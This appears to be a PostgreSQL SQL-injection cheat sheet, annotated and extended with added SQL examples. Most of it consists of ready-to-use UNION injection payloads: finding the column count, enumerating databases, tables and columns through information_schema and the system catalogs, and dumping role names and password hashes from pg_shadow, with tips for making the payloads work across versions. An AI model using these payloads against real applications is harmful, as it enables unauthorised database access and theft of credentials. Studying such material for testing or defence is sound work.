PostgreSQL combines some traits of MSSQL, MySQL and Oracle:
Stacked queries are supported (several statements separated by ;), and SELECT needs no FROM clause.
The postgres user is a superuser (the bootstrap account). COPY to or from a server-side file requires superuser (or, from PostgreSQL 11, membership in pg_read_server_files / pg_write_server_files).
Comments: -- , /**/
Whitespace substitutes: %20 , + , /**/
Built-in functions:
current_database() //name of the current database
session_user //the role that opened the session (the login user)
current_user //the role currently in effect; differs from session_user after SET ROLE or inside a SECURITY DEFINER function
user //same as current_user
version() //server version string (also reveals platform and compiler)
Union injection:
order by n-- //increase n until the query errors; the last working n is the column count
and 1=2 union select null,null,null-- //null is compatible with every column type, so this confirms the count (here 3)
and 1=2 union select 'beach',null,null-- //move the string through the positions to find a column that accepts text
and 1=2 union select (select version()),null,null-- //each UNION column must match the type of the original column; cast to text (oid::text, cast(x as varchar)) where needed
Getting table and column names (newer versions, via information_schema):
string_agg(table_name, ',') //PostgreSQL has no group_concat(); string_agg() (9.0+) or array_to_string(array(select ...), ',') returns all names in one row instead of walking offset n
and 1=2 union select table_name,null,null from information_schema.tables limit 1 offset n-- //walk n = 0,1,2,...; add where table_schema='public' to skip the catalog tables
and 1=2 union select column_name,null,null from information_schema.columns where table_name='admin' limit 1 offset n--
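As an added example (not from the original post), the information_schema enumeration above collapsed into one result row per step, so the injection returns everything at once instead of being walked with offset n. The schema name public and the table name admin are assumed; the three-column UNION shape follows the text.

```sql
-- Added example, not from the original post. Assumes a 'public.admin' table
-- and a UNION with three text-compatible columns, as in the text's payloads.

-- 1. Every non-system table in one string, schema.table, comma separated.
--    string_agg() exists since PostgreSQL 9.0 and replaces MySQL's group_concat().
SELECT string_agg(table_schema::text || '.' || table_name::text, ',')
FROM information_schema.tables
WHERE table_schema NOT IN ('pg_catalog', 'information_schema')
  AND table_type = 'BASE TABLE';

-- 2. Columns of one table as name:type, in column order.
--    Filter on table_schema too: the same table name can exist in several schemas.
SELECT string_agg(column_name::text || ':' || data_type::text, ',' ORDER BY ordinal_position)
FROM information_schema.columns
WHERE table_schema = 'public' AND table_name = 'admin';

-- 3. Step 2 in the text's UNION shape (subselect in the text-capable column,
--    the rest null). Sent after a numeric parameter such as id=1:
--    and 1=2 union select (select string_agg(column_name::text,',') from information_schema.columns where table_name='admin'),null,null--

-- 4. Fallback for servers older than 9.0, which lack string_agg():
SELECT array_to_string(array(SELECT table_name::text
                             FROM information_schema.tables
                             WHERE table_schema = 'public'), ',');
```

The ::text casts are there because the information_schema columns are of the domain type sql_identifier; PostgreSQL resolves string_agg() and || on them without the casts in practice, but the casts make the payload independent of the server version.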
(Older versions: read the system catalogs directly; they exist on every release)
pg_class.oid corresponds to pg_attribute.attrelid
pg_class.relname //table name
pg_attribute.attname //column name
select relname from pg_class //get table names
select oid from pg_class where <condition> //get the oid of the table
select attname from pg_attribute where attrelid=<oid value> //get the column names of that table
In practice:
and 1=2 union select relname,null,null from pg_class where relkind='r' limit 1 offset 0-- //relkind='r' restricts the result to ordinary tables (no indexes, sequences, views)
and 1=2 union select cast(oid as varchar(10)),null,null from pg_class where relkind='r' limit 1 offset 0--
oid has its own type, oid, so for the UNION to type-check it is cast to varchar. Suppose this returns 1136:
and 1=2 union select attname,null,null from pg_attribute where attrelid=1136 limit 1 offset 0-- //dumps column names; add "and attnum>0 and not attisdropped" to skip the hidden system columns (ctid, xmin, ...) and dropped columns, which otherwise come out first
======================================================================
and 1=2 union select datname,null,null from pg_database limit 1 offset 0-- //dump database names
and 1=2 union select usename||chr(124)||passwd,null,null from pg_shadow limit 1 offset 0-- //dump database users and password hashes separated by | (chr(124)); the column is usename, not username; pg_shadow is readable only by superusers, so this needs a superuser connection (the postgres case above)
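As an added example (not from the original post), the same enumeration through pg_class, pg_attribute, pg_database and pg_shadow with the filters a practitioner wants: system schemas excluded, system and dropped columns skipped, template databases dropped, and the usename column spelled as the catalog has it. The oid 1136 and the table public.admin are assumed, as in the text.

```sql
-- Added example, not from the original post. Assumes a 'public.admin' table
-- whose oid in this run is 1136; oid is cast to text so it fits a text column.

-- 1. Ordinary tables (relkind = 'r') outside the system schemas, with their oid.
SELECT c.oid::text AS table_oid, n.nspname::text || '.' || c.relname::text AS table_name
FROM pg_class c
JOIN pg_namespace n ON n.oid = c.relnamespace
WHERE c.relkind = 'r'
  AND n.nspname NOT IN ('pg_catalog', 'information_schema')
ORDER BY c.oid;

-- 2. Columns of one table by oid, with their types.
--    attnum > 0 skips the hidden system columns (ctid, xmin, cmin, ...), and
--    NOT attisdropped skips dropped columns that still occupy an attnum slot;
--    without both filters an offset walk returns junk names before the real ones.
SELECT a.attnum, a.attname::text, format_type(a.atttypid, a.atttypmod) AS col_type
FROM pg_attribute a
WHERE a.attrelid = 1136
  AND a.attnum > 0
  AND NOT a.attisdropped
ORDER BY a.attnum;

-- 3. Same column list in one row, by table name instead of oid
--    (regclass resolves the name through search_path).
SELECT string_agg(attname::text, ',' ORDER BY attnum)
FROM pg_attribute
WHERE attrelid = 'public.admin'::regclass
  AND attnum > 0 AND NOT attisdropped;

-- 4. Databases on the server, template0/template1 excluded.
SELECT string_agg(datname::text, ',')
FROM pg_database
WHERE NOT datistemplate;

-- 5. Roles and password hashes (superuser only; pg_authid holds the same data).
--    Older hashes look like 'md5' || md5(password || usename); PostgreSQL 10+
--    may store SCRAM-SHA-256 verifiers instead, which cannot be passed as-is.
SELECT usename::text || chr(124) || passwd
FROM pg_shadow
WHERE passwd IS NOT NULL;
```

Each SELECT drops into the text's payload as a subselect in the text-capable column: and 1=2 union select (select string_agg(datname::text,',') from pg_database where not datistemplate),null,null--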